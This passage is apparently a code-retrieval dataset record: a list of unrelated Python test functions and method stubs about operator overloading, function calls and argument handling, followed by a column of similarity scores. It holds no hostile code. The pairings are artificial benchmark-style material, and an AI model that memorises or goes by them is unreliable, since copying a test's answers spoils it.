pass", "def _support_op(*args):\n def inner(func):\n for one_arg in args:\n _op_mapping_[one_arg] = func\n return func\n\n return inner", "def test_invocation_order(foo):\n assert foo.value == 2", "def test_operator_adapt(self):\n\n # test string concatenation\n expr = test_table.c.data + \"somedata\"\n assert testing.db.execute(select([expr])).scalar() == \"somedatasomedata\"\n\n expr = test_table.c.id + 15\n assert testing.db.execute(select([expr])).scalar() == 16\n\n # test custom operator conversion\n expr = test_table.c.avalue + 40\n assert expr.type.__class__ is test_table.c.avalue.type.__class__\n\n # value here is calculated as (250 - 40) / 10 = 21\n # because \"40\" is an integer, not an \"avalue\"\n assert testing.db.execute(select([expr.label('foo')])).scalar() == 21\n\n expr = test_table.c.avalue + literal(40, type_=MyCustomType)\n \n # + operator converted to -\n # value is calculated as: (250 - (40 * 10)) / 10 == -15\n assert testing.db.execute(select([expr.label('foo')])).scalar() == -15\n\n # this one relies upon anonymous labeling to assemble result\n # processing rules on the column.\n assert testing.db.execute(select([expr])).scalar() == -15", "def test_no_mutually_exclusive_args_provided(self):\n _func = mutually_exclusive_parameters('arg1', 'arg2')(undecorated_func)\n self.assertEqual(_func(), 'foo')\n 
self.assertEqual(_func(arg3='hello'), 'foo')", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def __pow__(self, *args, **kwargs): # real signature unknown\n pass", "def _arg_swapper(op):\n\n def op_swapped(a, b, *args, **kwargs):\n return op(b, a, *args, **kwargs)\n\n return op_swapped", "def test_arithmetic_preserves_superrep(superrep,\n operation, check_op, check_scalar):\n dims = [[[2], [2]], [[2], [2]]]\n shape = (4, 4)\n S1 = Qobj(np.random.random(shape), superrep=superrep, dims=dims)\n S2 = Qobj(np.random.random(shape), superrep=superrep, dims=dims)\n x = np.random.random()\n\n check_list = []\n if check_op:\n check_list.append(operation(S1, S2))\n if check_scalar:\n check_list.append(operation(S1, x))\n if check_op and check_scalar:\n check_list.append(operation(x, S2))\n\n for S in check_list:\n assert S.type == \"super\"\n assert S.superrep == superrep", "def test_neg_operate_with_extra_parameter(self):\n key = (\"test\", \"demo\", 1)\n policy = {}\n llist = [{\"op\": aerospike.OPERATOR_PREPEND, \"bin\": \"name\", \"val\": \"ram\"}]\n with pytest.raises(TypeError) as typeError:\n self.as_connection.operate(key, llist, {}, policy, \"\")\n\n assert \"operate() takes at most 4 arguments (5 given)\" in str(typeError.value)", "def test_xcomarg_shift(self, test_dag):\n # Unpack the fixture\n dag, (op1, op2, op3, op4) = test_dag\n # Arrange the operators with a Label in the middle\n op1_arg = XComArg(op1, \"test_key\")\n op1_arg >> Label(\"Label 1\") >> [op2, op3]\n op1_arg >> op4\n # Check that the DAG has the right edge info\n assert dag.get_edge_info(op1.task_id, op2.task_id) == {\"label\": \"Label 1\"}\n assert dag.get_edge_info(op1.task_id, op4.task_id) == {}", "def __call__(self, *args, **kw):\n ...", "def dummy_fn(self, *args, **kwargs):", "def __call__(obj):", "def test_vargs(self):", "def test_pos():\n # Test for positive special method with scalar Rnode object\n x = Rnode(5)\n z = +x\n try:\n assert z.value == 1 * x.value\n except AssertionError as e:\n print(e)\n raise AssertionError", "def test_parameterless_calls(self):\n for attr in dir(api):\n func = getattr(api, attr)\n if callable(func): \n spec = inspect.getargspec(func)\n if not spec.args and not spec.varargs and not spec.keywords and not spec.defaults:\n func()", "def test_add_consistency2(self) -> None:\n a = Constant(\n 'const1',\n Float32(),\n np.zeros([1, 3, 3])\n )\n b = Constant(\n 'const2',\n Float32(),\n np.zeros([2])\n )\n input_ops = {'A': cast(Operator, a), 'B': cast(Operator, b)}\n try:\n Add(\n 'add1',\n 
[1, 3, 3],\n Float32(),\n input_ops\n )\n except AssertionError:\n print(\"Consistency test for 'Add' #2 passed!\")\n\n else:\n self.assertTrue(False, \"Consistency test for 'Add' #2 failed.\")", "def _op_bool(self, op: str, other: t.Any) -> bool:\n if hasattr(self.__members__, op):\n if isinstance(other, InspectableSet):\n other = other.__members__\n return getattr(self.__members__, op)(other)\n return NotImplemented", "def dummy(*args, **kwargs):\r\n pass", "def __call__(object):", "def _op(\n x: Union[int, float, dts.Number, tps.NumericValue],\n y: Union[int, float, dts.Number, tps.NumericValue],\n ) -> T:", "def __call__(self, param, xyz=False):\n pass", "def test_matmul():\n class Vector:\n def __init__(self, *args):\n self.args = args\n \n def __matmul__(self, other):\n if not isinstance(other, Vector):\n return NotImplemented\n return sum(i*j for i, j in zip(self.args, other.args))\n \n v1 = Vector(1, 2)\n v2 = Vector(1, 2)\n assert v1@v2 == 5\n a = Step('a')\n assert do_eval(a @ v1, a=v2) == v1@v2\n a = Step('a')\n assert do_eval(v1 @ a, a=v2) == v1@v2", "def test_add_consistency1(self) -> None:\n a = Constant(\n 'const1',\n Float32(),\n np.zeros([1, 3, 3])\n )\n b = Constant(\n 'const2',\n Float32(),\n np.zeros([3])\n )\n input_ops = {'A': cast(Operator, a), 'B': cast(Operator, b)}\n Add(\n 'add1',\n [1, 3, 3],\n Float32(),\n input_ops\n )\n\n print(\"Consistency test for 'Add' #1 passed!\")", "def test(arg1, arg2):\n return arg1 + arg2", "def test_no_requirements(self):\n def f():\n pass\n self._run_as_operator(f)", "def test_iadd():\n #test instance += instance expression\n circle = Circle(2) \n circle += circle\n assert circle == Circle(4)\n # test += 2 expression\n circle = Circle(2)\n circle += 2\n assert circle == Circle(4)", "def __call__(self, *args):\n assert is_symbol(self.op) and not self.args\n return Expr(self.op, *args)", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __pow__(self,*args):\r\n pass", "def apply(self, *args: _Data) -> _Data:", "def _inherit_binary_operation(self, other, op):\n sdata = self.data\n if isinstance(op, basestring) and hasattr(sdata, op):\n bound_op = getattr(sdata, op)\n else:\n def bound_op(odata):\n return op(sdata, odata)\n\n bset = self.bset\n if isinstance(other, type(self)) or isinstance(self, type(other)):\n obset = other.bset\n if not ((bset == obset) or\n bset.shape == () or\n obset.shape == ()):\n raise ValueError(\"instances of {} must be defined over \"\n \"instances of {} that compare equal for \"\n \"binary operations to be defined\"\n .format(self.__class__.__name__,\n bset.__class__.__name__))\n new_data = bound_op(other.data)\n if bset.shape == ():\n bset = obset\n else:\n new_data = bound_op(other)\n\n return type(self)(new_data, bset)", "def test_wrapper_with_params():\n my_method = SGMethod(\"test\")\n par = my_method.create_parameter(\"par1\")\n other_method = SGMethod(\"other\")\n par1 = other_method.create_parameter(\"par1\")\n \n my_method.calls(other_method)\n my_method.check_call_validity();\n \n assert other_method == my_method.method_called\n assert len(my_method.args) == 1\n assert par == my_method.args[0]", "def test_operation_kwarg(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\"Coherent(alpha=-0.3+2j) | 0\\n\")\n assert bb.operations == [\n {\"modes\": [0], \"op\": \"Coherent\", \"args\": [], \"kwargs\": {\"alpha\": 
-0.3 + 2j}}\n ]", "def reverse_operate(\n self, op: OperatorType, other: Any, **kwargs: Any\n ) -> Operators:\n raise NotImplementedError(str(op))", "def do_oprn(self, *args, operator=None, **kwargs):\n\t\tself.operator = operator\n\n\t\tif not self.operator:\n\t\t\treturn f'No operator provided'\n\n\t\tif self.operator == '+':\n\t\t\treturn self.sum(*args, **kwargs)\n\t\telif self.operator == '-':\n\t\t\treturn self.subtract(*args, **kwargs)\n\t\telif self.operator == '*':\n\t\t\treturn self.multiple(*args, **kwargs)\n\t\telif self.operator == '/':\n\t\t\treturn self.division(*args, **kwargs)\n\t\telse:\n\t\t\treturn f'Currently Operator ({operator}) is not Applicable'", "def test_bound_methods():\r\n a = Klass()\r\n b = Klass()\r\n nose.tools.assert_not_equal(filter_args(a.f, [], (1, )),\r\n filter_args(b.f, [], (1, )))", "def __init__(self, op, value):\n self.op = op\n self.value = value", "def test_superApply(self):\n one = t.Action(\"1\")\n x = t.Action(\"x\")\n a = t.Apply(\"super\", \"main\", [one, x])\n self.assertEqual(writePython(a),\n dd(\"\"\"\n _G_python_1, lastError = 1, None\n self.considerError(lastError, None)\n _G_python_2, lastError = eval('x', self.globals, _locals), None\n self.considerError(lastError, None)\n _G_apply_3, lastError = self.superApply(\"main\", _G_python_1, _G_python_2)\n self.considerError(lastError, None)\n _G_apply_3\n \"\"\"))", "def test_map_args_level():\n pass", "def to_op(self):\n raise NotImplementedError", "def test_member_method_inputs(self):\r\n\r\n # test that explicit Method inputs don't use shared storage\r\n M = Module()\r\n M.x = T.dscalar()\r\n M.y = T.dscalar()\r\n M.f = Method([M.x], M.x + M.y)\r\n M.g = Method([M.y], M.x - M.y)\r\n m = M.make()\r\n m.y = 77\r\n assert m.f(23) == 100\r\n assert m.x is None\r\n m.x = 1000\r\n assert m.g(23) == 977\r\n assert m.y == 77\r\n assert m.x == 1000", "def test_missing_args_static_method(a, x, y, z=3, t=1): # noqa: D213, D407", "def test_basic_method_call_wrapper():\n my_method = SGMethod(\"test\")\n other_method = SGMethod(\"other\")\n \n my_method.calls(other_method)\n my_method.check_call_validity();\n \n assert other_method == my_method.method_called\n assert len(my_method.args) == 0", "def test_arguments(self):\n calls = []\n decorator = self.decorator()\n\n @decorator\n def func(a, b, c):\n calls.append((a, b, c))\n\n func(1, 2, c=3)\n self.assertEqual(calls, [(1, 2, 3)])", "def function(self, *args):\n raise NotImplemented", "def __call__(self, *args, **kwargs):\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\n raise NotImplementedError", "def test_param_of_func(self):\n source = \"\"\"\n def foo(x, y):\n return x + y\n \"\"\"\n target = \"\"\"\n def foo(x_new, y_new):\n return x + y\n \"\"\"\n self._check_compatibility(source, target)" ]
[ "0.6805851", "0.6484445", "0.6379259", "0.6364742", "0.6364742", "0.6306603", "0.6228619", "0.61764985", "0.61253047", "0.61219794", "0.6098357", "0.60761136", "0.59945655", "0.5985499", "0.5953652", "0.5947286", "0.59347874", "0.59075207", "0.5906247", "0.590326", "0.5891721", "0.5878505", "0.58742213", "0.5851081", "0.5851081", "0.5851081", "0.5844272", "0.5840465", "0.5819834", "0.5814746", "0.5799022", "0.5775556", "0.5757402", "0.5757166", "0.57456243", "0.57403773", "0.5704036", "0.5700698", "0.5674039", "0.56643814", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5655367", "0.5654159", "0.565167", "0.56409127", "0.56376374", "0.56289315", "0.5626796", "0.56235546", "0.5620106", "0.56165016", "0.56159204", "0.5601042", "0.5599311", "0.55936474", "0.55926543", "0.5591661", "0.5581775", "0.55813205", "0.55802697", "0.5578437", "0.55748624", "0.55699486", "0.55697197", "0.5567493", "0.5567493", "0.5567493", "0.5558634", "0.5554938", "0.55542105", "0.5551742", "0.5550034", "0.55480343", "0.5530925", "0.552827", "0.55279964", "0.55264693", "0.5521478", "0.55214643", "0.5521311", "0.55107015", "0.5496168", "0.54961485", "0.5494629", "0.549462", "0.549462", "0.5492618" ]
0.0
-1
Test calltime symbol overrides with other symbols
def test_override_symbol(self): i, j, k, l = dimify('i j k l') a = symbol(name='a', dimensions=(i, j, k, l), value=2.) a1 = symbol(name='a1', dimensions=(i, j, k, l), value=3.) a2 = symbol(name='a2', dimensions=(i, j, k, l), value=4.) op = Operator(Eq(a, a + 3)) op() op(a=a1) op(a=a2) shape = [d.size for d in [i, j, k, l]] assert(np.allclose(a.data, np.zeros(shape) + 5)) assert(np.allclose(a1.data, np.zeros(shape) + 6)) assert(np.allclose(a2.data, np.zeros(shape) + 7))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def testSymbolHash(self):\n gScope = pykd.diaLoadPdb( str(target.module.pdb()) )\n symSet = set([ gScope[\"g_structTest\"], gScope[\"EnumWindowsProc1\"], gScope[\"g_structTest\"] ])\n self.assertEqual( 2, len(symSet) )\n self.assertTrue( gScope[\"g_structTest\"] in symSet )\n self.assertFalse( gScope[\"EnumWindowsProc2\"] in symSet )", "def FakeSymbol(*args, _op, **kwargs):\n return symbol.Custom(*args, _op=_op, op_type=\"_fake\", **kwargs)", "def test_fix_code_typical_code():\r\n\r\n pass", "def test_symbol(self, data, symbol_first, symbol_second):\n layer = Points(data)\n assert layer.symbol == \"disc\"\n\n layer.symbol = symbol_first\n assert layer.symbol == symbol_first\n\n layer = Points(data, symbol=symbol_first)\n assert layer.symbol == symbol_first\n\n layer.symbol = symbol_second\n assert layer.symbol == symbol_second", "def testCtor(self):\n try: pykd.DiaSymbol()\n except RuntimeError: pass", "def execute(self, symbol_table, test_mode=False):", "def execute(self, symbol_table, test_mode=False):", "def test_GetSymbolMapping_no_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\", \"\"]\n self.assertDictEqual({}, stack_utils.GetSymbolMapping(lines))", "def test_GetSymbolMapping_parameter_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo?q=hello at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def test_GetSymbolMapping_multiple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/otherapp.mojo at /path/to/otherapp.mojo/.kW07s\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\",\n \"/path/to/otherapp.mojo/.kW07s\": \"libotherapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def test_GetSymbolMapping_simple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def enable_named_call():\n global _use_named_call\n _use_named_call = True", "def test_symbol_lookup(self):\r\n\r\n def check_lookup(symbol, expected):\r\n op = BaseWhereOperator.get_operator(symbol)\r\n self.assertEqual(op, expected)\r\n\r\n check_lookup('EQ', EqualsOperator)\r\n check_lookup('IN', InOperator)\r\n check_lookup('GT', GreaterThanOperator)\r\n check_lookup('GTE', GreaterThanOrEqualOperator)\r\n check_lookup('LT', LessThanOperator)\r\n check_lookup('LTE', LessThanOrEqualOperator)", "def stubFunc( *args, **keywords ):\n maya.cmds.dynamicLoad( library )\n # call the real function which has replaced us\n return maya.cmds.__dict__[command]( *args, **keywords )", "def test_patch_pci_switch(self):\n pass", "def run(self, *args, **kw):\n if kw.has_key('SYMROOT'):\n del kw['SYMROOT']\n super(TestGypBase, self).run(*args, **kw)", "def 
test_symbol_lookup(self):\n\n def check_lookup(symbol, expected):\n op = BaseWhereOperator.get_operator(symbol)\n self.assertEqual(op, expected)\n\n check_lookup('EQ', EqualsOperator)\n check_lookup('IN', InOperator)\n check_lookup('GT', GreaterThanOperator)\n check_lookup('GTE', GreaterThanOrEqualOperator)\n check_lookup('LT', LessThanOperator)\n check_lookup('LTE', LessThanOrEqualOperator)", "def test_override_builtin(self):\n PyLoader.register(override_builtins=True)\n self.assertIs(PRIORITY_HOOKS['.py'], PyLoader)", "def test_stub(self):\n pass", "def test_patch_none():", "def test_patch_bios_unit(self):\n pass", "def test_keyword(self):\n varargs = ()\n kwargs = {'default' : 12}\n method = getattr(self.foo,'f_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['default'] == 12)\n self.assert_(len(var_dict) == 1)", "def test_010(self):\n caller = self.get_caller([SingleMethod])\n self.assertEqual(\"I have very little to say.\", caller())", "def __call__(fun_name):", "def setUp(self):\n self.Triton = TritonContext()\n self.Triton.setArchitecture(ARCH.X86_64)\n self.Triton.setMode(MODE.ONLY_ON_SYMBOLIZED, True)\n super(TestSymbolicEngineOnlySymbolized, self).setUp()", "def symbols(self):\n pass", "def test_GetSymbolMapping_normalize(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/.//myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def compilation_test(interp, source):\r\n print '*** Compiling symbols from file: %s ***' % util.within_VCode(source)\r\n interp.cleanup_dictionary()\r\n interp.parse_symbols_from_file(source)\r\n print '\\n\\nParsed symbols are: '\r\n interp.print_symbols()\r\n print 'Unresolved abbreviations are:'\r\n unresolved = interp.peek_at_unresolved()\r\n sorted_unresolved = unresolved.keys()\r\n sorted_unresolved.sort()\r\n for an_abbreviation in sorted_unresolved:\r\n symbol_list = unresolved[an_abbreviation].keys()\r\n symbol_list.sort()\r\n print '\\'%s\\': appears in %s' % (an_abbreviation, str(symbol_list))\r\n \r\n print '\\n*** End of compilation test ***\\n'", "def assert_structural_equal_ignore_global_symbol(\n func1: PrimFunc,\n func2: PrimFunc,\n *args: Any,\n **kwargs: Any,\n) -> None:\n assert_structural_equal(\n func1.with_attr(\"global_symbol\", \"main\"),\n func2.with_attr(\"global_symbol\", \"main\"),\n *args,\n **kwargs,\n )", "def test_override_builtin_extension_without_explicit_flag(self):\n with self.assertRaises(ValueError):\n PyLoader.register()", "def test_call(self):\r\n self.assertEqual(self.cs(), {})", "def test_main_gc_1(test):\n answers = (i for i in (test, 'b', 'q'))\n with mock.patch.object(builtins, 'input', lambda _: next(answers)):\n g_c.main()", "def test_func_base(self):\n cmd = \"x/s $_base()\"\n self.assertFailIfInactiveSession(gdb_run_cmd(cmd))\n res = gdb_start_silent_cmd(cmd)\n self.assertNoException(res)\n self.assertIn(\"\\\\177ELF\", res)\n addr = res.splitlines()[-1].split()[0][:-1]\n\n cmd = \"x/s $_base(\\\"libc\\\")\"\n res = gdb_start_silent_cmd(cmd)\n self.assertNoException(res)\n self.assertIn(\"\\\\177ELF\", res)\n addr2 = res.splitlines()[-1].split()[0][:-1]\n self.assertNotEqual(addr, addr2)", "def test_method(self, test, another_test, _): # noqa: D213, D407", "def 
test_func_dict_not_imported_module():\n\n plot_toggles = {\"SMF\": True}\n module_name = \"not_a_module.funcs\"\n function_prefix = \"calc_\"\n\n with pytest.raises(KeyError):\n func_dict = generate_func_dict(plot_toggles, module_name, function_prefix)", "def test(): # TO BE DELETED WHEN PROGRAM COMPLETED\n print('methode test')", "def test_method(self):\n self.assertEqual(self.method, 'modified strong collision')", "def test_10_detect(self):\n for backend, spec in subtests.items():\n with self.subTest(backend=backend):\n e.Ty(spec[\"launch\"], delay=1)\n e.Ty(spec[\"break_main\"])\n e.Ty('run\\n', delay=1)\n\n cur, breaks = e.GetSigns()\n self.assertEqual('test.cpp:17', cur)\n self.assertEqual([17], breaks)\n\n e.In('<esc>')\n e.In('ZZ')", "def test_inherent_instance_method() -> None:\n assert lmp.tknzr._bpe.BPETknzr.dec == BaseTknzr.dec\n assert lmp.tknzr._bpe.BPETknzr.enc == BaseTknzr.enc\n assert lmp.tknzr._bpe.BPETknzr.norm == BaseTknzr.norm\n assert lmp.tknzr._bpe.BPETknzr.pad_to_max == BaseTknzr.pad_to_max\n assert lmp.tknzr._bpe.BPETknzr.vocab_size == BaseTknzr.vocab_size", "def do_calltip(self):\n if self.debug:\n print >>sys.__stdout__, \"do_calltip\"\n separators = re.compile('[\\s\\{\\}\\[\\]\\(\\)\\= ,:]')\n symbol = self.input_buffer\n symbol_string = separators.split(symbol)[-1]\n base_symbol_string = symbol_string.split('.')[0]\n if base_symbol_string in self.shell.user_ns:\n symbol = self.shell.user_ns[base_symbol_string]\n elif base_symbol_string in self.shell.user_global_ns:\n symbol = self.shell.user_global_ns[base_symbol_string]\n elif base_symbol_string in __builtin__.__dict__:\n symbol = __builtin__.__dict__[base_symbol_string]\n else:\n return False\n try:\n for name in symbol_string.split('.')[1:] + ['__doc__']:\n symbol = getattr(symbol, name)\n self.AutoCompCancel()\n # Check that the symbol can indeed be converted to a string:\n symbol += ''\n wx.CallAfter(self.CallTipShow, self.GetCurrentPos(), symbol)\n except:\n # The retrieve symbol couldn't be converted to a string\n pass", "def disable_named_call():\n global _use_named_call\n _use_named_call = False", "def test_2(self):\n event = MockEvent(u\"%run aa\")\n mockself = None\n match = set(magic_run_completer(mockself, event))\n self.assertEqual(match, set([u\"aaø.py\"]))", "def test_main_gc_2(test):\n answers = (i for i in (test, '1 1 1 1', 'q'))\n with mock.patch.object(builtins, 'input', lambda _: next(answers)):\n g_c.main()", "def test_compiler_arguments_not_execute(patch, compiler, lines, tree):\n patch.init(StorySyntaxError)\n patch.object(Objects, 'arguments')\n lines.last.return_value = '1'\n lines.lines = {'1': {'method': 'whatever'}}\n with raises(StorySyntaxError):\n compiler.arguments(tree, '0')\n error = 'arguments_noservice'\n StorySyntaxError.__init__.assert_called_with(error, tree=tree)", "def test_rpcCall(self):\n pass", "def test_class_method() -> None:\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.add_CLI_args) == inspect.signature(BaseTknzr.add_CLI_args)", "def test_smethod_line_explicit_args(self):\n os.environ = BASE_ENVIRON\n self.plugin.init([\"dummy\", \"boom\"])\n for transport, transport_bindaddr in list(self.plugin.getBindAddresses().items()):\n self.plugin.reportMethodSuccess(transport, transport_bindaddr, \"roots=culture,first=fire\")\n self.plugin.reportMethodsEnd()\n\n self.assertIn(\"SMETHOD boom 127.0.0.1:6666 ARGS:roots=culture,first=fire\\n\", self.getOutputLines())", "def test_syntax(self):\n\t\ttheResult = False\n\t\ttry:\n\t\t\tfrom .context import code\n\t\t\tfrom 
code import restart_service\n\t\t\ttheResult = True\n\t\texcept Exception:\n\t\t\ttheResult = False\n\t\tassert theResult", "def __init__(self):\r\n self.s_table = SymbolTable.preSymbols", "def dummy_method_silent(self):\n\n pass", "def test_calls(self):\n ex = self.ex\n m = self.m\n n = self.n\n\n nreps = random.randint(1, 10)\n ex.nreps = nreps\n ex.vary[\"X\"][\"with\"].add(\"rep\")\n ex.infer_lds()\n\n cmds = ex.generate_cmds()\n\n idx = random.randint(0, nreps - 1)\n self.assertIn([\"name\", m, n, \"X_%d\" % idx, m, \"Y\", m, \"Z\", n], cmds)", "def test_py_compile_condition(self):\n self._test_py_compile('coin')", "def test_no_matching_method(self):\n self.cook_obj.prepare_chapati(4)\n self.assertEquals(sys.stdout.getvalue().strip(), \"4 chapatis ready\")", "def test():\n pass", "def dummy_fn(self):\n\t\tpass", "def test_required_methods(self):", "def test_exec_prefix(self):\n self.chck_triple('exec_prefix')", "def _missing_symbol_to_skipped_tests(self):\n return {\n \"MathMLElement\": [\"mathml\"],\n \"GraphicsLayer\": [\"compositing\"],\n \"WebCoreHas3DRendering\": [\"animations/3d\", \"transforms/3d\"],\n \"WebGLShader\": [\"fast/canvas/webgl\", \"compositing/webgl\", \"http/tests/canvas/webgl\"],\n \"MHTMLArchive\": [\"mhtml\"],\n }", "def test_2(self):\n event = MockEvent(u\"%run aa\")\n mockself = None\n match = set(magic_run_completer(mockself, event))\n self.assertEqual(match, set([u\"aao.py\"]))", "def test_turtle(self):\n assert not inspection.is_fixture_method(DummyTestCase.turtle_method)", "def test_03_visit_special(self):", "def test_two_instmaps_different(self):\n instmap1 = FakeAthens().defaults().instruction_schedule_map\n instmap2 = copy.deepcopy(instmap1)\n\n # override one of instruction\n instmap2.add(\"sx\", (0,), Schedule())\n\n self.assertNotEqual(instmap1, instmap2)", "def test_notCalledInDefault(self):\n us = WeirdCallableOptions()\n argV = []\n us.parseOptions(argV)", "def _test(self):", "def _test(self):", "def _test(self):", "def _test(self):", "def _test(self):", "def test_no_shadowed_builtins(command_name, command_table, builtins):\n errors = []\n for sub_name, sub_command in command_table.items():\n op_help = sub_command.create_help_command()\n arg_table = op_help.arg_table\n for arg_name in arg_table:\n if any(p.startswith(arg_name) for p in builtins):\n # Then we are shadowing or prefixing a top level argument\n errors.append(\n 'Shadowing/Prefixing a top level option: '\n '%s.%s.%s' % (command_name, sub_name, arg_name))\n if errors:\n raise AssertionError('\\n' + '\\n'.join(errors))", "def testinternfunc(self):\n\t\treturn describeInterface(self)", "def test_man9ext(self):\n self.chck_triple('man9ext')", "def test_method(self, test, another_test, z, _, x=1, y=2, _private_arg=1): # noqa: D213, D407", "def test():\r\n pass", "def _test(self):\n pass", "def _test(self):\n pass", "def _test(self):\n pass", "def test_with_hook_init_param(self):\n class h_dup(funhook.Hook):\n def __init__(self, n):\n super(h_dup, self).__init__(n)\n self.accept_kwargs = False\n self.accept_pos_args = True\n self.accept_ret = False\n\n self._n = n\n\n def before(self, bnd, n):\n return (n+self._n, )\n\n\n class cls_pp(object):\n @funhook.attach_([h_dup(501)])\n def func(self, n):\n return n+1\n\n class cls_p1(cls_pp):\n pass\n\n class cls_p2(cls_pp):\n pass\n\n @funhook.setup_([adapt_hook_from()]) \n class cls_chd(cls_p1, cls_p2):\n def func(self, n):\n return n-1\n\n self.assertEqual(cls_pp().func(1), 503)\n self.assertEqual(cls_chd().func(1), 501)", "def dummy(self):\n 
pass", "def test_dummy():", "def test_main_gc_3(test):\n with mock.patch.object(builtins, 'input', lambda _: test):\n g_c.main()", "def _test(self, c):\n\treturn self.UNRESOLVED\t\t# Placeholder", "def __init__(self, symbols):\r\n self.symbols = set(symbols)", "def test_basic_method_call_wrapper():\n my_method = SGMethod(\"test\")\n other_method = SGMethod(\"other\")\n \n my_method.calls(other_method)\n my_method.check_call_validity();\n \n assert other_method == my_method.method_called\n assert len(my_method.args) == 0", "def test_issue_55():\n\n # full name change including stack trace\n\n @with_signature('bar()')\n def foo():\n return 'a'\n\n assert \"bar at\" in repr(foo)\n assert foo.__name__ == 'bar'\n assert foo() == 'a'\n\n # only metadata change\n\n @with_signature(None, func_name='bar')\n def foo():\n return 'a'\n\n if sys.version_info >= (3, 0):\n assert \"foo at\" in repr(foo)\n assert foo.__name__ == 'bar'\n assert foo() == 'a'", "def substitude_symbols(self, f):\n pass", "def test_change_name_of_the_devicefalse():", "def true(symbol):\n return True", "def test_1(self):\n event = MockEvent(u\"%run a\")\n mockself = None\n match = set(magic_run_completer(mockself, event))\n self.assertEqual(match, set([u\"a.py\", u\"aaø.py\"]))", "def before_test(self, func, *args, **kwargs):\n pass", "def test_same_class_method_name_different_class(self):\n self.apple.add_sweet_letter(self.cherry)\n apple_add_sweet_cherry_key = get_function_cache_key('class_method', 'tests.Fruit.add_sweet_letter',\n (self.apple, self.cherry), {})\n self.assertExpectedKeyInCache(apple_add_sweet_cherry_key)\n\n self.celery.add_sweet_letter(self.cherry)\n celery_add_sweet_cherry_key = get_function_cache_key('class_method', 'tests.Vegetable.add_sweet_letter',\n (self.celery, self.cherry), {})\n self.assertExpectedKeyInCache(celery_add_sweet_cherry_key)\n\n self.assertNotEqual(apple_add_sweet_cherry_key, celery_add_sweet_cherry_key)", "def test_name_and_keyword_arguments(self):\n mock_call = Call(\"some_name\", a=1024, b=3.1415, c=\"hello\")\n assert_that(str(mock_call), equal_to(\"Call(some_name, a=1024, b=3.1415, c=hello)\"))", "def test_3(self):\n event = MockEvent(u'%run \"a')\n mockself = None\n match = set(magic_run_completer(mockself, event))\n self.assertEqual(match, set([u\"a.py\", u\"aaø.py\"]))", "def stub_out(self, old, new):\n self.useFixture(fixtures.MonkeyPatch(old, new))", "def stub_out(self, old, new):\n self.useFixture(fixtures.MonkeyPatch(old, new))", "def test_change_name_of_the_devicetrue():", "def test_cli_fix():\n assert Cli is Cl", "def test_syntax_error_nested_symbol_table():\n reader = get_reader(\n \"\"\"\nmodule my_mod\ncontains\nFUNCTION dot_v_mod_2d( )\n REAL :: dot_v_mod_2d\n REAL, DIMENSION(:,:), POINTER, CONTIOUS :: z_msk_i\n dot_v_mod_2d = 0.0_wp\nEND FUNCTION dot_v_mod_2d\nend module my_mod\n\"\"\"\n )\n result = F2003.Module.match(reader)\n # There should be no match and, as a result, there should be no\n # symbol-table entries.\n assert result is None\n assert SYMBOL_TABLES._symbol_tables == {}", "def test_call_interface_twice(self, monkeypatch, data):\n 